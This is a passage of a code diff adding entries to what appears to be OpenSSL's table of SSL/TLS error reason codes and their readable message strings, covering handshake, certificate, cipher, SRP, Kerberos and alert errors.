+    {ERR_REASON(SSL_R_BAD_DH_P_LENGTH), "bad dh p length"},
+    {ERR_REASON(SSL_R_BAD_DIGEST_LENGTH), "bad digest length"},
+    {ERR_REASON(SSL_R_BAD_DSA_SIGNATURE), "bad dsa signature"},
+    {ERR_REASON(SSL_R_BAD_ECC_CERT), "bad ecc cert"},
+    {ERR_REASON(SSL_R_BAD_ECDSA_SIGNATURE), "bad ecdsa signature"},
+    {ERR_REASON(SSL_R_BAD_ECPOINT), "bad ecpoint"},
+    {ERR_REASON(SSL_R_BAD_HANDSHAKE_LENGTH), "bad handshake length"},
+    {ERR_REASON(SSL_R_BAD_HELLO_REQUEST), "bad hello request"},
+    {ERR_REASON(SSL_R_BAD_LENGTH), "bad length"},
+    {ERR_REASON(SSL_R_BAD_MAC_DECODE), "bad mac decode"},
+    {ERR_REASON(SSL_R_BAD_MAC_LENGTH), "bad mac length"},
+    {ERR_REASON(SSL_R_BAD_MESSAGE_TYPE), "bad message type"},
+    {ERR_REASON(SSL_R_BAD_PACKET_LENGTH), "bad packet length"},
+    {ERR_REASON(SSL_R_BAD_PROTOCOL_VERSION_NUMBER),
+     "bad protocol version number"},
+    {ERR_REASON(SSL_R_BAD_PSK_IDENTITY_HINT_LENGTH),
+     "bad psk identity hint length"},
+    {ERR_REASON(SSL_R_BAD_RESPONSE_ARGUMENT), "bad response argument"},
+    {ERR_REASON(SSL_R_BAD_RSA_DECRYPT), "bad rsa decrypt"},
+    {ERR_REASON(SSL_R_BAD_RSA_ENCRYPT), "bad rsa encrypt"},
+    {ERR_REASON(SSL_R_BAD_RSA_E_LENGTH), "bad rsa e length"},
+    {ERR_REASON(SSL_R_BAD_RSA_MODULUS_LENGTH), "bad rsa modulus length"},
+    {ERR_REASON(SSL_R_BAD_RSA_SIGNATURE), "bad rsa signature"},
+    {ERR_REASON(SSL_R_BAD_SIGNATURE), "bad signature"},
+    {ERR_REASON(SSL_R_BAD_SRP_A_LENGTH), "bad srp a length"},
+    {ERR_REASON(SSL_R_BAD_SRP_B_LENGTH), "bad srp b length"},
+    {ERR_REASON(SSL_R_BAD_SRP_G_LENGTH), "bad srp g length"},
+    {ERR_REASON(SSL_R_BAD_SRP_N_LENGTH), "bad srp n length"},
+    {ERR_REASON(SSL_R_BAD_SRP_PARAMETERS), "bad srp parameters"},
+    {ERR_REASON(SSL_R_BAD_SRP_S_LENGTH), "bad srp s length"},
+    {ERR_REASON(SSL_R_BAD_SRTP_MKI_VALUE), "bad srtp mki value"},
+    {ERR_REASON(SSL_R_BAD_SRTP_PROTECTION_PROFILE_LIST),
+     "bad srtp protection profile list"},
+    {ERR_REASON(SSL_R_BAD_SSL_FILETYPE), "bad ssl filetype"},
+    {ERR_REASON(SSL_R_BAD_SSL_SESSION_ID_LENGTH),
+     "bad ssl session id length"},
+    {ERR_REASON(SSL_R_BAD_STATE), "bad state"},
+    {ERR_REASON(SSL_R_BAD_VALUE), "bad value"},
+    {ERR_REASON(SSL_R_BAD_WRITE_RETRY), "bad write retry"},
+    {ERR_REASON(SSL_R_BIO_NOT_SET), "bio not set"},
+    {ERR_REASON(SSL_R_BLOCK_CIPHER_PAD_IS_WRONG),
+     "block cipher pad is wrong"},
+    {ERR_REASON(SSL_R_BN_LIB), "bn lib"},
+    {ERR_REASON(SSL_R_CA_DN_LENGTH_MISMATCH), "ca dn length mismatch"},
+    {ERR_REASON(SSL_R_CA_DN_TOO_LONG), "ca dn too long"},
+    {ERR_REASON(SSL_R_CCS_RECEIVED_EARLY), "ccs received early"},
+    {ERR_REASON(SSL_R_CERTIFICATE_VERIFY_FAILED),
+     "certificate verify failed"},
+    {ERR_REASON(SSL_R_CERT_CB_ERROR), "cert cb error"},
+    {ERR_REASON(SSL_R_CERT_LENGTH_MISMATCH), "cert length mismatch"},
+    {ERR_REASON(SSL_R_CHALLENGE_IS_DIFFERENT), "challenge is different"},
+    {ERR_REASON(SSL_R_CIPHER_CODE_WRONG_LENGTH), "cipher code wrong length"},
+    {ERR_REASON(SSL_R_CIPHER_OR_HASH_UNAVAILABLE),
+     "cipher or hash unavailable"},
+    {ERR_REASON(SSL_R_CIPHER_TABLE_SRC_ERROR), "cipher table src error"},
+    {ERR_REASON(SSL_R_CLIENTHELLO_TLSEXT), "clienthello tlsext"},
+    {ERR_REASON(SSL_R_COMPRESSED_LENGTH_TOO_LONG),
+     "compressed length too long"},
+    {ERR_REASON(SSL_R_COMPRESSION_DISABLED), "compression disabled"},
+    {ERR_REASON(SSL_R_COMPRESSION_FAILURE), "compression failure"},
+    {ERR_REASON(SSL_R_COMPRESSION_ID_NOT_WITHIN_PRIVATE_RANGE),
+     "compression id not within private range"},
+    {ERR_REASON(SSL_R_COMPRESSION_LIBRARY_ERROR),
+     "compression library error"},
+    {ERR_REASON(SSL_R_CONNECTION_ID_IS_DIFFERENT),
+     "connection id is different"},
+    {ERR_REASON(SSL_R_CONNECTION_TYPE_NOT_SET), "connection type not set"},
+    {ERR_REASON(SSL_R_COOKIE_MISMATCH), "cookie mismatch"},
+    {ERR_REASON(SSL_R_DATA_BETWEEN_CCS_AND_FINISHED),
+     "data between ccs and finished"},
+    {ERR_REASON(SSL_R_DATA_LENGTH_TOO_LONG), "data length too long"},
+    {ERR_REASON(SSL_R_DECRYPTION_FAILED), "decryption failed"},
+    {ERR_REASON(SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC),
+     "decryption failed or bad record mac"},
+    {ERR_REASON(SSL_R_DH_PUBLIC_VALUE_LENGTH_IS_WRONG),
+     "dh public value length is wrong"},
+    {ERR_REASON(SSL_R_DIGEST_CHECK_FAILED), "digest check failed"},
+    {ERR_REASON(SSL_R_DTLS_MESSAGE_TOO_BIG), "dtls message too big"},
+    {ERR_REASON(SSL_R_DUPLICATE_COMPRESSION_ID), "duplicate compression id"},
+    {ERR_REASON(SSL_R_ECC_CERT_NOT_FOR_KEY_AGREEMENT),
+     "ecc cert not for key agreement"},
+    {ERR_REASON(SSL_R_ECC_CERT_NOT_FOR_SIGNING), "ecc cert not for signing"},
+    {ERR_REASON(SSL_R_ECC_CERT_SHOULD_HAVE_RSA_SIGNATURE),
+     "ecc cert should have rsa signature"},
+    {ERR_REASON(SSL_R_ECC_CERT_SHOULD_HAVE_SHA1_SIGNATURE),
+     "ecc cert should have sha1 signature"},
+    {ERR_REASON(SSL_R_ECDH_REQUIRED_FOR_SUITEB_MODE),
+     "ecdh required for suiteb mode"},
+    {ERR_REASON(SSL_R_ECGROUP_TOO_LARGE_FOR_CIPHER),
+     "ecgroup too large for cipher"},
+    {ERR_REASON(SSL_R_EMPTY_SRTP_PROTECTION_PROFILE_LIST),
+     "empty srtp protection profile list"},
+    {ERR_REASON(SSL_R_ENCRYPTED_LENGTH_TOO_LONG),
+     "encrypted length too long"},
+    {ERR_REASON(SSL_R_ERROR_GENERATING_TMP_RSA_KEY),
+     "error generating tmp rsa key"},
+    {ERR_REASON(SSL_R_ERROR_IN_RECEIVED_CIPHER_LIST),
+     "error in received cipher list"},
+    {ERR_REASON(SSL_R_EXCESSIVE_MESSAGE_SIZE), "excessive message size"},
+    {ERR_REASON(SSL_R_EXTRA_DATA_IN_MESSAGE), "extra data in message"},
+    {ERR_REASON(SSL_R_GOT_A_FIN_BEFORE_A_CCS), "got a fin before a ccs"},
+    {ERR_REASON(SSL_R_GOT_NEXT_PROTO_BEFORE_A_CCS),
+     "got next proto before a ccs"},
+    {ERR_REASON(SSL_R_GOT_NEXT_PROTO_WITHOUT_EXTENSION),
+     "got next proto without seeing extension"},
+    {ERR_REASON(SSL_R_HTTPS_PROXY_REQUEST), "https proxy request"},
+    {ERR_REASON(SSL_R_HTTP_REQUEST), "http request"},
+    {ERR_REASON(SSL_R_ILLEGAL_PADDING), "illegal padding"},
+    {ERR_REASON(SSL_R_ILLEGAL_SUITEB_DIGEST), "illegal Suite B digest"},
+    {ERR_REASON(SSL_R_INAPPROPRIATE_FALLBACK), "inappropriate fallback"},
+    {ERR_REASON(SSL_R_INCONSISTENT_COMPRESSION), "inconsistent compression"},
+    {ERR_REASON(SSL_R_INVALID_CHALLENGE_LENGTH), "invalid challenge length"},
+    {ERR_REASON(SSL_R_INVALID_COMMAND), "invalid command"},
+    {ERR_REASON(SSL_R_INVALID_COMPRESSION_ALGORITHM),
+     "invalid compression algorithm"},
+    {ERR_REASON(SSL_R_INVALID_NULL_CMD_NAME), "invalid null cmd name"},
+    {ERR_REASON(SSL_R_INVALID_PURPOSE), "invalid purpose"},
+    {ERR_REASON(SSL_R_INVALID_SERVERINFO_DATA), "invalid serverinfo data"},
+    {ERR_REASON(SSL_R_INVALID_SRP_USERNAME), "invalid srp username"},
+    {ERR_REASON(SSL_R_INVALID_STATUS_RESPONSE), "invalid status response"},
+    {ERR_REASON(SSL_R_INVALID_TICKET_KEYS_LENGTH),
+     "invalid ticket keys length"},
+    {ERR_REASON(SSL_R_INVALID_TRUST), "invalid trust"},
+    {ERR_REASON(SSL_R_KEY_ARG_TOO_LONG), "key arg too long"},
+    {ERR_REASON(SSL_R_KRB5), "krb5"},
+    {ERR_REASON(SSL_R_KRB5_C_CC_PRINC), "krb5 client cc principal (no tkt?)"},
+    {ERR_REASON(SSL_R_KRB5_C_GET_CRED), "krb5 client get cred"},
+    {ERR_REASON(SSL_R_KRB5_C_INIT), "krb5 client init"},
+    {ERR_REASON(SSL_R_KRB5_C_MK_REQ), "krb5 client mk_req (expired tkt?)"},
+    {ERR_REASON(SSL_R_KRB5_S_BAD_TICKET), "krb5 server bad ticket"},
+    {ERR_REASON(SSL_R_KRB5_S_INIT), "krb5 server init"},
+    {ERR_REASON(SSL_R_KRB5_S_RD_REQ), "krb5 server rd_req (keytab perms?)"},
+    {ERR_REASON(SSL_R_KRB5_S_TKT_EXPIRED), "krb5 server tkt expired"},
+    {ERR_REASON(SSL_R_KRB5_S_TKT_NYV), "krb5 server tkt not yet valid"},
+    {ERR_REASON(SSL_R_KRB5_S_TKT_SKEW), "krb5 server tkt skew"},
+    {ERR_REASON(SSL_R_LENGTH_MISMATCH), "length mismatch"},
+    {ERR_REASON(SSL_R_LENGTH_TOO_SHORT), "length too short"},
+    {ERR_REASON(SSL_R_LIBRARY_BUG), "library bug"},
+    {ERR_REASON(SSL_R_LIBRARY_HAS_NO_CIPHERS), "library has no ciphers"},
+    {ERR_REASON(SSL_R_MESSAGE_TOO_LONG), "message too long"},
+    {ERR_REASON(SSL_R_MISSING_DH_DSA_CERT), "missing dh dsa cert"},
+    {ERR_REASON(SSL_R_MISSING_DH_KEY), "missing dh key"},
+    {ERR_REASON(SSL_R_MISSING_DH_RSA_CERT), "missing dh rsa cert"},
+    {ERR_REASON(SSL_R_MISSING_DSA_SIGNING_CERT), "missing dsa signing cert"},
+    {ERR_REASON(SSL_R_MISSING_ECDH_CERT), "missing ecdh cert"},
+    {ERR_REASON(SSL_R_MISSING_ECDSA_SIGNING_CERT),
+     "missing ecdsa signing cert"},
+    {ERR_REASON(SSL_R_MISSING_EXPORT_TMP_DH_KEY),
+     "missing export tmp dh key"},
+    {ERR_REASON(SSL_R_MISSING_EXPORT_TMP_RSA_KEY),
+     "missing export tmp rsa key"},
+    {ERR_REASON(SSL_R_MISSING_RSA_CERTIFICATE), "missing rsa certificate"},
+    {ERR_REASON(SSL_R_MISSING_RSA_ENCRYPTING_CERT),
+     "missing rsa encrypting cert"},
+    {ERR_REASON(SSL_R_MISSING_RSA_SIGNING_CERT), "missing rsa signing cert"},
+    {ERR_REASON(SSL_R_MISSING_SRP_PARAM), "can't find SRP server param"},
+    {ERR_REASON(SSL_R_MISSING_TMP_DH_KEY), "missing tmp dh key"},
+    {ERR_REASON(SSL_R_MISSING_TMP_ECDH_KEY), "missing tmp ecdh key"},
+    {ERR_REASON(SSL_R_MISSING_TMP_RSA_KEY), "missing tmp rsa key"},
+    {ERR_REASON(SSL_R_MISSING_TMP_RSA_PKEY), "missing tmp rsa pkey"},
+    {ERR_REASON(SSL_R_MISSING_VERIFY_MESSAGE), "missing verify message"},
+    {ERR_REASON(SSL_R_MULTIPLE_SGC_RESTARTS), "multiple sgc restarts"},
+    {ERR_REASON(SSL_R_NON_SSLV2_INITIAL_PACKET), "non sslv2 initial packet"},
+    {ERR_REASON(SSL_R_NO_CERTIFICATES_RETURNED), "no certificates returned"},
+    {ERR_REASON(SSL_R_NO_CERTIFICATE_ASSIGNED), "no certificate assigned"},
+    {ERR_REASON(SSL_R_NO_CERTIFICATE_RETURNED), "no certificate returned"},
+    {ERR_REASON(SSL_R_NO_CERTIFICATE_SET), "no certificate set"},
+    {ERR_REASON(SSL_R_NO_CERTIFICATE_SPECIFIED), "no certificate specified"},
+    {ERR_REASON(SSL_R_NO_CIPHERS_AVAILABLE), "no ciphers available"},
+    {ERR_REASON(SSL_R_NO_CIPHERS_PASSED), "no ciphers passed"},
+    {ERR_REASON(SSL_R_NO_CIPHERS_SPECIFIED), "no ciphers specified"},
+    {ERR_REASON(SSL_R_NO_CIPHER_LIST), "no cipher list"},
+    {ERR_REASON(SSL_R_NO_CIPHER_MATCH), "no cipher match"},
+    {ERR_REASON(SSL_R_NO_CLIENT_CERT_METHOD), "no client cert method"},
+    {ERR_REASON(SSL_R_NO_CLIENT_CERT_RECEIVED), "no client cert received"},
+    {ERR_REASON(SSL_R_NO_COMPRESSION_SPECIFIED), "no compression specified"},
+    {ERR_REASON(SSL_R_NO_GOST_CERTIFICATE_SENT_BY_PEER),
+     "Peer haven't sent GOST certificate, required for selected ciphersuite"},
+    {ERR_REASON(SSL_R_NO_METHOD_SPECIFIED), "no method specified"},
+    {ERR_REASON(SSL_R_NO_PEM_EXTENSIONS), "no pem extensions"},
+    {ERR_REASON(SSL_R_NO_PRIVATEKEY), "no privatekey"},
+    {ERR_REASON(SSL_R_NO_PRIVATE_KEY_ASSIGNED), "no private key assigned"},
+    {ERR_REASON(SSL_R_NO_PROTOCOLS_AVAILABLE), "no protocols available"},
+    {ERR_REASON(SSL_R_NO_PUBLICKEY), "no publickey"},
+    {ERR_REASON(SSL_R_NO_RENEGOTIATION), "no renegotiation"},
+    {ERR_REASON(SSL_R_NO_REQUIRED_DIGEST),
+     "digest requred for handshake isn't computed"},
+    {ERR_REASON(SSL_R_NO_SHARED_CIPHER), "no shared cipher"},
+    {ERR_REASON(SSL_R_NO_SHARED_SIGATURE_ALGORITHMS),
+     "no shared sigature algorithms"},
+    {ERR_REASON(SSL_R_NO_SRTP_PROFILES), "no srtp profiles"},
+    {ERR_REASON(SSL_R_NO_VERIFY_CALLBACK), "no verify callback"},
+    {ERR_REASON(SSL_R_NULL_SSL_CTX), "null ssl ctx"},
+    {ERR_REASON(SSL_R_NULL_SSL_METHOD_PASSED), "null ssl method passed"},
+    {ERR_REASON(SSL_R_OLD_SESSION_CIPHER_NOT_RETURNED),
+     "old session cipher not returned"},
+    {ERR_REASON(SSL_R_OLD_SESSION_COMPRESSION_ALGORITHM_NOT_RETURNED),
+     "old session compression algorithm not returned"},
+    {ERR_REASON(SSL_R_ONLY_DTLS_1_2_ALLOWED_IN_SUITEB_MODE),
+     "only DTLS 1.2 allowed in Suite B mode"},
+    {ERR_REASON(SSL_R_ONLY_TLS_1_2_ALLOWED_IN_SUITEB_MODE),
+     "only TLS 1.2 allowed in Suite B mode"},
+    {ERR_REASON(SSL_R_ONLY_TLS_ALLOWED_IN_FIPS_MODE),
+     "only tls allowed in fips mode"},
+    {ERR_REASON(SSL_R_OPAQUE_PRF_INPUT_TOO_LONG),
+     "opaque PRF input too long"},
+    {ERR_REASON(SSL_R_PACKET_LENGTH_TOO_LONG), "packet length too long"},
+    {ERR_REASON(SSL_R_PARSE_TLSEXT), "parse tlsext"},
+    {ERR_REASON(SSL_R_PATH_TOO_LONG), "path too long"},
+    {ERR_REASON(SSL_R_PEER_DID_NOT_RETURN_A_CERTIFICATE),
+     "peer did not return a certificate"},
+    {ERR_REASON(SSL_R_PEER_ERROR), "peer error"},
+    {ERR_REASON(SSL_R_PEER_ERROR_CERTIFICATE), "peer error certificate"},
+    {ERR_REASON(SSL_R_PEER_ERROR_NO_CERTIFICATE),
+     "peer error no certificate"},
+    {ERR_REASON(SSL_R_PEER_ERROR_NO_CIPHER), "peer error no cipher"},
+    {ERR_REASON(SSL_R_PEER_ERROR_UNSUPPORTED_CERTIFICATE_TYPE),
+     "peer error unsupported certificate type"},
+    {ERR_REASON(SSL_R_PEM_NAME_BAD_PREFIX), "pem name bad prefix"},
+    {ERR_REASON(SSL_R_PEM_NAME_TOO_SHORT), "pem name too short"},
+    {ERR_REASON(SSL_R_PRE_MAC_LENGTH_TOO_LONG), "pre mac length too long"},
+    {ERR_REASON(SSL_R_PROBLEMS_MAPPING_CIPHER_FUNCTIONS),
+     "problems mapping cipher functions"},
+    {ERR_REASON(SSL_R_PROTOCOL_IS_SHUTDOWN), "protocol is shutdown"},
+    {ERR_REASON(SSL_R_PSK_IDENTITY_NOT_FOUND), "psk identity not found"},
+    {ERR_REASON(SSL_R_PSK_NO_CLIENT_CB), "psk no client cb"},
+    {ERR_REASON(SSL_R_PSK_NO_SERVER_CB), "psk no server cb"},
+    {ERR_REASON(SSL_R_PUBLIC_KEY_ENCRYPT_ERROR), "public key encrypt error"},
+    {ERR_REASON(SSL_R_PUBLIC_KEY_IS_NOT_RSA), "public key is not rsa"},
+    {ERR_REASON(SSL_R_PUBLIC_KEY_NOT_RSA), "public key not rsa"},
+    {ERR_REASON(SSL_R_READ_BIO_NOT_SET), "read bio not set"},
+    {ERR_REASON(SSL_R_READ_TIMEOUT_EXPIRED), "read timeout expired"},
+    {ERR_REASON(SSL_R_READ_WRONG_PACKET_TYPE), "read wrong packet type"},
+    {ERR_REASON(SSL_R_RECORD_LENGTH_MISMATCH), "record length mismatch"},
+    {ERR_REASON(SSL_R_RECORD_TOO_LARGE), "record too large"},
+    {ERR_REASON(SSL_R_RECORD_TOO_SMALL), "record too small"},
+    {ERR_REASON(SSL_R_RENEGOTIATE_EXT_TOO_LONG), "renegotiate ext too long"},
+    {ERR_REASON(SSL_R_RENEGOTIATION_ENCODING_ERR),
+     "renegotiation encoding err"},
+    {ERR_REASON(SSL_R_RENEGOTIATION_MISMATCH), "renegotiation mismatch"},
+    {ERR_REASON(SSL_R_REQUIRED_CIPHER_MISSING), "required cipher missing"},
+    {ERR_REASON(SSL_R_REQUIRED_COMPRESSSION_ALGORITHM_MISSING),
+     "required compresssion algorithm missing"},
+    {ERR_REASON(SSL_R_REUSE_CERT_LENGTH_NOT_ZERO),
+     "reuse cert length not zero"},
+    {ERR_REASON(SSL_R_REUSE_CERT_TYPE_NOT_ZERO), "reuse cert type not zero"},
+    {ERR_REASON(SSL_R_REUSE_CIPHER_LIST_NOT_ZERO),
+     "reuse cipher list not zero"},
+    {ERR_REASON(SSL_R_SCSV_RECEIVED_WHEN_RENEGOTIATING),
+     "scsv received when renegotiating"},
+    {ERR_REASON(SSL_R_SERVERHELLO_TLSEXT), "serverhello tlsext"},
+    {ERR_REASON(SSL_R_SESSION_ID_CONTEXT_UNINITIALIZED),
+     "session id context uninitialized"},
+    {ERR_REASON(SSL_R_SHORT_READ), "short read"},
+    {ERR_REASON(SSL_R_SIGNATURE_ALGORITHMS_ERROR),
+     "signature algorithms error"},
+    {ERR_REASON(SSL_R_SIGNATURE_FOR_NON_SIGNING_CERTIFICATE),
+     "signature for non signing certificate"},
+    {ERR_REASON(SSL_R_SRP_A_CALC), "error with the srp params"},
+    {ERR_REASON(SSL_R_SRTP_COULD_NOT_ALLOCATE_PROFILES),
+     "srtp could not allocate profiles"},
+    {ERR_REASON(SSL_R_SRTP_PROTECTION_PROFILE_LIST_TOO_LONG),
+     "srtp protection profile list too long"},
+    {ERR_REASON(SSL_R_SRTP_UNKNOWN_PROTECTION_PROFILE),
+     "srtp unknown protection profile"},
+    {ERR_REASON(SSL_R_SSL23_DOING_SESSION_ID_REUSE),
+     "ssl23 doing session id reuse"},
+    {ERR_REASON(SSL_R_SSL2_CONNECTION_ID_TOO_LONG),
+     "ssl2 connection id too long"},
+    {ERR_REASON(SSL_R_SSL3_EXT_INVALID_ECPOINTFORMAT),
+     "ssl3 ext invalid ecpointformat"},
+    {ERR_REASON(SSL_R_SSL3_EXT_INVALID_SERVERNAME),
+     "ssl3 ext invalid servername"},
+    {ERR_REASON(SSL_R_SSL3_EXT_INVALID_SERVERNAME_TYPE),
+     "ssl3 ext invalid servername type"},
+    {ERR_REASON(SSL_R_SSL3_SESSION_ID_TOO_LONG), "ssl3 session id too long"},
+    {ERR_REASON(SSL_R_SSL3_SESSION_ID_TOO_SHORT),
+     "ssl3 session id too short"},
+    {ERR_REASON(SSL_R_SSLV3_ALERT_BAD_CERTIFICATE),
+     "sslv3 alert bad certificate"},
+    {ERR_REASON(SSL_R_SSLV3_ALERT_BAD_RECORD_MAC),
+     "sslv3 alert bad record mac"},
+    {ERR_REASON(SSL_R_SSLV3_ALERT_CERTIFICATE_EXPIRED),
+     "sslv3 alert certificate expired"},
+    {ERR_REASON(SSL_R_SSLV3_ALERT_CERTIFICATE_REVOKED),
+     "sslv3 alert certificate revoked"},
+    {ERR_REASON(SSL_R_SSLV3_ALERT_CERTIFICATE_UNKNOWN),
+     "sslv3 alert certificate unknown"},
+    {ERR_REASON(SSL_R_SSLV3_ALERT_DECOMPRESSION_FAILURE),
+     "sslv3 alert decompression failure"},
+    {ERR_REASON(SSL_R_SSLV3_ALERT_HANDSHAKE_FAILURE),
+     "sslv3 alert handshake failure"},
+    {ERR_REASON(SSL_R_SSLV3_ALERT_ILLEGAL_PARAMETER),
+     "sslv3 alert illegal parameter"},
+    {ERR_REASON(SSL_R_SSLV3_ALERT_NO_CERTIFICATE),
+     "sslv3 alert no certificate"},
+    {ERR_REASON(SSL_R_SSLV3_ALERT_UNEXPECTED_MESSAGE),
+     "sslv3 alert unexpected message"},
+    {ERR_REASON(SSL_R_SSLV3_ALERT_UNSUPPORTED_CERTIFICATE),
+     "sslv3 alert unsupported certificate"},
+    {ERR_REASON(SSL_R_SSL_CTX_HAS_NO_DEFAULT_SSL_VERSION),
+     "ssl ctx has no default ssl version"},
+    {ERR_REASON(SSL_R_SSL_HANDSHAKE_FAILURE), "ssl handshake failure"},
+    {ERR_REASON(SSL_R_SSL_LIBRARY_HAS_NO_CIPHERS),
+     "ssl library has no ciphers"},
+    {ERR_REASON(SSL_R_SSL_SESSION_ID_CALLBACK_FAILED),
+     "ssl session id callback failed"},
+    {ERR_REASON(SSL_R_SSL_SESSION_ID_CONFLICT), "ssl session id conflict"},
+    {ERR_REASON(SSL_R_SSL_SESSION_ID_CONTEXT_TOO_LONG),
+     "ssl session id context too long"},
+    {ERR_REASON(SSL_R_SSL_SESSION_ID_HAS_BAD_LENGTH),
+     "ssl session id has bad length"},
+    {ERR_REASON(SSL_R_SSL_SESSION_ID_IS_DIFFERENT),
+     "ssl session id is different"},
+    {ERR_REASON(SSL_R_TLSV1_ALERT_ACCESS_DENIED),
+     "tlsv1 alert access denied"},
+    {ERR_REASON(SSL_R_TLSV1_ALERT_DECODE_ERROR), "tlsv1 alert decode error"},
+    {ERR_REASON(SSL_R_TLSV1_ALERT_DECRYPTION_FAILED),
+     "tlsv1 alert decryption failed"},
+    {ERR_REASON(SSL_R_TLSV1_ALERT_DECRYPT_ERROR),
+     "tlsv1 alert decrypt error"},
+    {ERR_REASON(SSL_R_TLSV1_ALERT_EXPORT_RESTRICTION),
+     "tlsv1 alert export restriction"},
+    {ERR_REASON(SSL_R_TLSV1_ALERT_INAPPROPRIATE_FALLBACK),
+     "tlsv1 alert inappropriate fallback"},
+    {ERR_REASON(SSL_R_TLSV1_ALERT_INSUFFICIENT_SECURITY),
+     "tlsv1 alert insufficient security"},
+    {ERR_REASON(SSL_R_TLSV1_ALERT_INTERNAL_ERROR),
+     "tlsv1 alert internal error"},
+    {ERR_REASON(SSL_R_TLSV1_ALERT_NO_RENEGOTIATION),
+     "tlsv1 alert no renegotiation"},
+    {ERR_REASON(SSL_R_TLSV1_ALERT_PROTOCOL_VERSION),
+     "tlsv1 alert protocol version"},
+    {ERR_REASON(SSL_R_TLSV1_ALERT_RECORD_OVERFLOW),
+     "tlsv1 alert record overflow"},
+    {ERR_REASON(SSL_R_TLSV1_ALERT_UNKNOWN_CA), "tlsv1 alert unknown ca"},
+    {ERR_REASON(SSL_R_TLSV1_ALERT_USER_CANCELLED),
+     "tlsv1 alert user cancelled"},
+    {ERR_REASON(SSL_R_TLSV1_BAD_CERTIFICATE_HASH_VALUE),
+     "tlsv1 bad certificate hash value"},
+    {ERR_REASON(SSL_R_TLSV1_BAD_CERTIFICATE_STATUS_RESPONSE),
+     "tlsv1 bad certificate status response"},
+    {ERR_REASON(SSL_R_TLSV1_CERTIFICATE_UNOBTAINABLE),
+     "tlsv1 certificate unobtainable"},
+    {ERR_REASON(SSL_R_TLSV1_UNRECOGNIZED_NAME), "tlsv1 unrecognized name"},
+    {ERR_REASON(SSL_R_TLSV1_UNSUPPORTED_EXTENSION),
+     "tlsv1 unsupported extension"},
+    {ERR_REASON(SSL_R_TLS_CLIENT_CERT_REQ_WITH_ANON_CIPHER),
+     "tls client cert req with anon cipher"},
+    {ERR_REASON(SSL_R_TLS_HEARTBEAT_PEER_DOESNT_ACCEPT),
+     "peer does not accept heartbeats"},
+    {ERR_REASON(SSL_R_TLS_HEARTBEAT_PENDING),
+     "heartbeat request already pending"},
+    {ERR_REASON(SSL_R_TLS_ILLEGAL_EXPORTER_LABEL),
+     "tls illegal exporter label"},
+    {ERR_REASON(SSL_R_TLS_INVALID_ECPOINTFORMAT_LIST),
+     "tls invalid ecpointformat list"},
+    {ERR_REASON(SSL_R_TLS_PEER_DID_NOT_RESPOND_WITH_CERTIFICATE_LIST),
+     "tls peer did not respond with certificate list"},
+    {ERR_REASON(SSL_R_TLS_RSA_ENCRYPTED_VALUE_LENGTH_IS_WRONG),
+     "tls rsa encrypted value length is wrong"},
+    {ERR_REASON(SSL_R_TRIED_TO_USE_UNSUPPORTED_CIPHER),
+     "tried to use unsupported cipher"},
+    {ERR_REASON(SSL_R_UNABLE_TO_DECODE_DH_CERTS),
+     "unable to decode dh certs"},
+    {ERR_REASON(SSL_R_UNABLE_TO_DECODE_ECDH_CERTS),
+     "unable to decode ecdh certs"},
+    {ERR_REASON(SSL_R_UNABLE_TO_EXTRACT_PUBLIC_KEY),
+     "unable to extract public key"},
+    {ERR_REASON(SSL_R_UNABLE_TO_FIND_DH_PARAMETERS),
+     "unable to find dh parameters"},
+    {ERR_REASON(SSL_R_UNABLE_TO_FIND_ECDH_PARAMETERS),
+     "unable to find ecdh parameters"},
+    {ERR_REASON(SSL_R_UNABLE_TO_FIND_PUBLIC_KEY_PARAMETERS),
+     "unable to find public key parameters"},
+    {ERR_REASON(SSL_R_UNABLE_TO_FIND_SSL_METHOD),
+     "unable to find ssl method"},
+    {ERR_REASON(SSL_R_UNABLE_TO_LOAD_SSL2_MD5_ROUTINES),
+     "unable to load ssl2 md5 routines"},
+    {ERR_REASON(SSL_R_UNABLE_TO_LOAD_SSL3_MD5_ROUTINES),
+     "unable to load ssl3 md5 routines"},
+    {ERR_REASON(SSL_R_UNABLE_TO_LOAD_SSL3_SHA1_ROUTINES),
+     "unable to load ssl3 sha1 routines"},
+    {ERR_REASON(SSL_R_UNEXPECTED_MESSAGE), "unexpected message"},
+    {ERR_REASON(SSL_R_UNEXPECTED_RECORD), "unexpected record"},
+    {ERR_REASON(SSL_R_UNINITIALIZED), "uninitialized"},
+    {ERR_REASON(SSL_R_UNKNOWN_ALERT_TYPE), "unknown alert type"},
+    {ERR_REASON(SSL_R_UNKNOWN_CERTIFICATE_TYPE), "unknown certificate type"},
+    {ERR_REASON(SSL_R_UNKNOWN_CIPHER_RETURNED), "unknown cipher returned"},
+    {ERR_REASON(SSL_R_UNKNOWN_CIPHER_TYPE), "unknown cipher type"},
+    {ERR_REASON(SSL_R_UNKNOWN_CMD_NAME), "unknown cmd name"},
+    {ERR_REASON(SSL_R_UNKNOWN_DIGEST), "unknown digest"},
+    {ERR_REASON(SSL_R_UNKNOWN_KEY_EXCHANGE_TYPE),
+     "unknown key exchange type"},
+    {ERR_REASON(SSL_R_UNKNOWN_PKEY_TYPE), "unknown pkey type"},
+    {ERR_REASON(SSL_R_UNKNOWN_PROTOCOL), "unknown protocol"},
+    {ERR_REASON(SSL_R_UNKNOWN_REMOTE_ERROR_TYPE),
+     "unknown remote error type"},
+    {ERR_REASON(SSL_R_UNKNOWN_SSL_VERSION), "unknown ssl version"},
+    {ERR_REASON(SSL_R_UNKNOWN_STATE), "unknown state"},
+    {ERR_REASON(SSL_R_UNSAFE_LEGACY_RENEGOTIATION_DISABLED),
+     "unsafe legacy renegotiation disabled"},
+    {ERR_REASON(SSL_R_UNSUPPORTED_CIPHER), "unsupported cipher"},
+    {ERR_REASON(SSL_R_UNSUPPORTED_COMPRESSION_ALGORITHM),
+     "unsupported compression algorithm"},
+    {ERR_REASON(SSL_R_UNSUPPORTED_DIGEST_TYPE), "unsupported digest type"},
+    {ERR_REASON(SSL_R_UNSUPPORTED_ELLIPTIC_CURVE),
+     "unsupported elliptic curve"},
+    {ERR_REASON(SSL_R_UNSUPPORTED_PROTOCOL), "unsupported protocol"},
+    {ERR_REASON(SSL_R_UNSUPPORTED_SSL_VERSION), "unsupported ssl version"},
+    {ERR_REASON(SSL_R_UNSUPPORTED_STATUS_TYPE), "unsupported status type"},
+    {ERR_REASON(SSL_R_USE_SRTP_NOT_NEGOTIATED), "use srtp not negotiated"},
+    {ERR_REASON(SSL_R_WRITE_BIO_NOT_SET), "write bio not set"},
